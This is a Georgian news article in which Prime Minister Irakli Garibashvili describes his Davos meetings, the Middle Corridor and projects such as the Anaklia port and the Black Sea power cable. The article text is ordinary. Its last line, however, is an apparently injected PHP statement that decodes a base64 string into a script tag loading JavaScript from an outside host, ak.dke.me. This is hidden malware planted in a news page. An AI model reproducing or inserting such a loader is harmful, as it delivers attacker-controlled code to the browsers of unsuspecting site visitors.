celsiusi
ავერსი შნაიდერი

 მქონდა ძალიან საინტერესო შეხვედრები მსხვილი კომპანიების წარმომადგენლებთან, ხელმძღვანელებთან, ვფიქრობ, ამ ყველაფერს ექნება გაგრძელება, – ამის შესახებ საქართველოს პრემიერ-მინისტრმა, ირაკლი ღარიბაშვილმა დავოსში ქართველ ჟურნალისტებს განუცხადა.

როგორც ირაკლი ღარიბაშვილმა აღნიშნა, მნიშვნელოვანი იყო მონაწილეობა დღევანდელ პანელზეც, რომელზეც დიდი დრო დაეთმო შუა დერეფნის განვითარებას და შუა დერეფნის განვითარებაში დიდი მნიშვნელობა ენიჭება საქართველოს.

„მქონდა შეხვედრა ისრაელის პრეზიდენტთან, რომელსაც ვესაუბრე ვრცლად ამ ვითარებაზე და მანაც გაგვიზიარა უახლესი ინფორმაცია რეგიონში არსებულ ვითარებაზე. მქონდა ძალიან საინტერესო შეხვედრები ძალიან მსხვილი კომპანიების წარმომადგენლებთან, ხელმძღვანელებთან. ვფიქრობ, რომ ამ ყველაფერს ექნება გაგრძელება. სჭირდება მიყოლა ამ საკითხებს. შევთანხმდით კონკრეტულ თარიღებზე, როცა მოხდება მათი სტუმრობა საქართველოში, რომ მოხდეს ახალი ინვესტიციების განხორციელება ქვეყანაში. ვფიქრობ, მნიშვნელოვანი იყო ჩვენი ქვეყნის მონაწილეობა დღევანდელ პანელზეც, რომელზეც დიდი დრო დავუთმეთ შუა დერეფნის განვითარებას და შუა დერეფნის განვითარებაში დიდი მნიშვნელობა ენიჭება საქართველოს, ვინაიდან ჩვენ ვართ კარიბჭე ევროპასა და აზიას შორის, ყველაზე უმოკლესი, დამაკავშირებელი გზა ვართ ჩვენ. მე კიდევ ერთხელ აღვნიშნე იმ დიდი პროექტების შესახებ, რომლებზეც ვმუშაობთ, იქნება ეს ანაკლიის პორტის პროექტი, აეროპორტის პროექტი თუ სხვა მიმდინარე მსხვილი პროექტები, ისევე როგორც შავი ზღვის ელექტროკაბელი, რომელიც ასევე მნიშვნელოვანი არის დაკავშირებადობის თვალსაზრისით. ეს საკითხები იყო ძირითადი განხილვის თემა წლევანდელ დავოსის ფორუმზე“, – განაცხადა ირაკლი ღარიბაშვილმა.

244
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");